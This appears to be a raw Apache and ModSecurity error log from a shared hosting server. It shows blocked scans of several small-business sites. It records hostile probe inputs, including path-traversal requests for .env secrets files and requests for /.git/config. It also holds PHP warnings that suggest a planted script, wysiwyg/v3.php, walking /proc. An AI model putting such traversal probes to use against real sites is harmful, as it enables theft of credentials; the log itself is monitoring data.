[Mon May 11 22:06:04.037722 2026] [security2:error] [pid 1588898:tid 1588900] [client 47.128.46.94:36774] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agI2rKFW67LJTsgN3jQFvAAAAAA"]
[Mon May 11 22:06:04.038236 2026] [security2:error] [pid 1588898:tid 1588900] [client 47.128.46.94:36774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agI2rKFW67LJTsgN3jQFvAAAAAA"]
[Mon May 11 22:06:04.146047 2026] [security2:error] [pid 1588898:tid 1588900] [client 47.128.46.94:36774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI2rKFW67LJTsgN3jQFvAAAAAA"]
[Mon May 11 22:06:40.533448 2026] [:error] [pid 1534836:tid 1534888] [client 114.119.146.40:28537] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr?action=login
[Mon May 11 22:06:44.862804 2026] [authz_core:error] [pid 1588898:tid 1588917] [client 95.111.239.37:61931] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 22:06:52.651563 2026] [authz_core:error] [pid 1534836:tid 1534889] [client 95.111.239.37:64388] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 22:07:33.160264 2026] [:error] [pid 1605480:tid 1605522] [client 186.4.136.216:29726] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:07:54.813816 2026] [ssl:error] [pid 1588898:tid 1588922] (EAI 2)Name or service not known: [client 74.7.175.189:59906] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:07:54.813875 2026] [ssl:error] [pid 1588898:tid 1588922] AH01941: stapling_renew_response: responder error
[Mon May 11 22:08:27.954475 2026] [security2:error] [pid 1590352:tid 1590393] [client 124.156.200.223:36588] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/comments/feed/"] [unique_id "agI3O61q0G_aXAqWauT0ZwAAAIE"]
[Mon May 11 22:09:16.283715 2026] [security2:error] [pid 1534836:tid 1534874] [client 129.226.151.24:56928] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Darwich-extrait-1.mp3"] [unique_id "agI3bNeaRXe5lR8y0ZOvnQAAAUM"]
[Mon May 11 22:09:33.229370 2026] [security2:error] [pid 1534836:tid 1534890] [client 47.128.46.67:34018] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agI3fdeaRXe5lR8y0ZOvrwAAAVM"]
[Mon May 11 22:09:33.230242 2026] [security2:error] [pid 1534836:tid 1534890] [client 47.128.46.67:34018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agI3fdeaRXe5lR8y0ZOvrwAAAVM"]
[Mon May 11 22:09:33.329553 2026] [security2:error] [pid 1534836:tid 1534890] [client 47.128.46.67:34018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI3fdeaRXe5lR8y0ZOvrwAAAVM"]
[Mon May 11 22:09:48.050041 2026] [authz_core:error] [pid 1588898:tid 1588919] [client 17.241.75.115:32926] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/search/error_log
[Mon May 11 22:10:10.128498 2026] [authz_core:error] [pid 1590352:tid 1590400] [client 95.111.239.37:58348] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 22:10:18.676281 2026] [authz_core:error] [pid 1606352:tid 1606438] [client 95.111.239.37:60936] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 22:10:19.494203 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php
[Mon May 11 22:10:19.494282 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php5
[Mon May 11 22:10:19.494317 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php4
[Mon May 11 22:10:19.494692 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php3
[Mon May 11 22:10:19.494777 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.pl
[Mon May 11 22:10:19.494864 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.cgi
[Mon May 11 22:10:19.494893 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.jsp
[Mon May 11 22:10:19.494948 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.phtml
[Mon May 11 22:10:19.494976 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 34.174.158.140:42140] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.shtml
[Mon May 11 22:10:55.503699 2026] [security2:error] [pid 1534836:tid 1534873] [client 43.153.208.32:45984] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agI3z9eaRXe5lR8y0ZOwJAAAAUI"]
[Mon May 11 22:11:02.611149 2026] [security2:error] [pid 1534836:tid 1534877] [client 43.153.208.32:34826] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agI31teaRXe5lR8y0ZOwMgAAAUY"], referer: http://www.rixonephotography.com
[Mon May 11 22:11:06.479084 2026] [:error] [pid 1588898:tid 1588920] [client 80.90.183.146:50627] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Mon May 11 22:11:06.659664 2026] [security2:error] [pid 1606352:tid 1606435] [client 43.163.4.179:43564] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI32no_DFxNSZVmaX3KeAAAANA"]
[Mon May 11 22:11:06.886214 2026] [:error] [pid 1601130:tid 1601172] [client 80.90.183.146:50663] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Mon May 11 22:11:08.189104 2026] [security2:error] [pid 1590352:tid 1590403] [client 8.231.43.16:35982] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agI33K1q0G_aXAqWauT1LAAAAIs"]
[Mon May 11 22:11:08.190549 2026] [security2:error] [pid 1590352:tid 1590403] [client 8.231.43.16:35982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agI33K1q0G_aXAqWauT1LAAAAIs"]
[Mon May 11 22:11:08.192353 2026] [security2:error] [pid 1590352:tid 1590403] [client 8.231.43.16:35982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agI33K1q0G_aXAqWauT1LAAAAIs"]
[Mon May 11 22:11:09.847912 2026] [core:error] [pid 1588898:tid 1588917] [client 34.186.253.242:58270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/wp/
[Mon May 11 22:11:09.848318 2026] [core:error] [pid 1588898:tid 1588917] [client 34.186.253.242:58270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/wp/
[Mon May 11 22:11:10.364800 2026] [core:error] [pid 1590352:tid 1590411] [client 34.186.253.242:58274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/backup/
[Mon May 11 22:11:10.364909 2026] [core:error] [pid 1590352:tid 1590411] [client 34.186.253.242:58274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/backup/
[Mon May 11 22:11:10.830039 2026] [core:error] [pid 1605480:tid 1605530] [client 34.186.253.242:60540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/new/
[Mon May 11 22:11:10.830076 2026] [core:error] [pid 1605480:tid 1605530] [client 34.186.253.242:60540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/new/
[Mon May 11 22:11:11.307746 2026] [core:error] [pid 1590352:tid 1590406] [client 34.186.253.242:60552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/old/
[Mon May 11 22:11:11.308089 2026] [core:error] [pid 1590352:tid 1590406] [client 34.186.253.242:60552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/old/
[Mon May 11 22:11:11.775372 2026] [core:error] [pid 1605480:tid 1605543] [client 34.186.253.242:60554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/blog/
[Mon May 11 22:11:11.775576 2026] [core:error] [pid 1605480:tid 1605543] [client 34.186.253.242:60554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/blog/
[Mon May 11 22:11:12.267072 2026] [core:error] [pid 1606352:tid 1606419] [client 34.186.253.242:60558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/
[Mon May 11 22:11:12.267392 2026] [core:error] [pid 1606352:tid 1606419] [client 34.186.253.242:60558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/
[Mon May 11 22:11:12.748768 2026] [core:error] [pid 1601130:tid 1601153] [client 34.186.253.242:60560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/wordpress/
[Mon May 11 22:11:12.748917 2026] [core:error] [pid 1601130:tid 1601153] [client 34.186.253.242:60560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm2.rentparadise.fr/wordpress/
[Mon May 11 22:11:49.203688 2026] [security2:error] [pid 1605480:tid 1605530] [client 124.156.206.78:33160] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agI4BR2Cvzd_nyNfUm_5sgAAAQg"]
PHP Warning:  filesize(): stat failed for /proc/208/task/208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/208/task/208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/208/task/208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:11:53.617098 2026] [security2:error] [pid 1588898:tid 1588908] [client 124.156.206.78:52226] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agI4CaFW67LJTsgN3jQHZQAAAAk"], referer: http://castiglionecf.com
[Mon May 11 22:11:58.187675 2026] [security2:error] [pid 1588898:tid 1588912] [client 124.156.206.78:60252] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agI4DqFW67LJTsgN3jQHbwAAAA0"], referer: https://castiglionecf.com/
[Mon May 11 22:12:03.417984 2026] [core:error] [pid 1588898:tid 1588909] [client 93.123.109.166:33566] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 22:12:03.528415 2026] [core:error] [pid 1534836:tid 1534881] [client 93.123.109.166:33532] AH10244: invalid URI path (/../.env)
[Mon May 11 22:12:03.528023 2026] [core:error] [pid 1606352:tid 1606423] [client 93.123.109.166:33624] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Mon May 11 22:12:16.349878 2026] [security2:error] [pid 1590352:tid 1590403] [client 43.134.98.88:48390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/vid/BackGround1-Manhattan.mp4"] [unique_id "agI4IK1q0G_aXAqWauT2HgAAAIs"]
[Mon May 11 22:12:37.911126 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:38.140266 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:38.365509 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:38.592805 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:38.818790 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:39.046491 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:39.274920 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:39.536350 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:39.771222 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:39.997726 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:40.226200 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:40.451851 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:40.676869 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:40.901691 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:41.133667 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:41.365194 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:41.594784 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:41.819792 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:42.058108 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:42.284551 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:42.510436 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:42.736342 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:42.961617 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:43.195192 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:43.425624 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:43.651058 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:43.878321 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:44.104127 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:44.331280 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:44.558842 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:44.786357 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:45.016812 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:45.242237 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:45.486819 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:45.743278 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:45.975151 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:46.201251 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:12:46.426676 2026] [:error] [pid 1588898:tid 1588902] [client 20.44.177.173:5324] File does not exist: /home/totalcloud/public_html/index.php
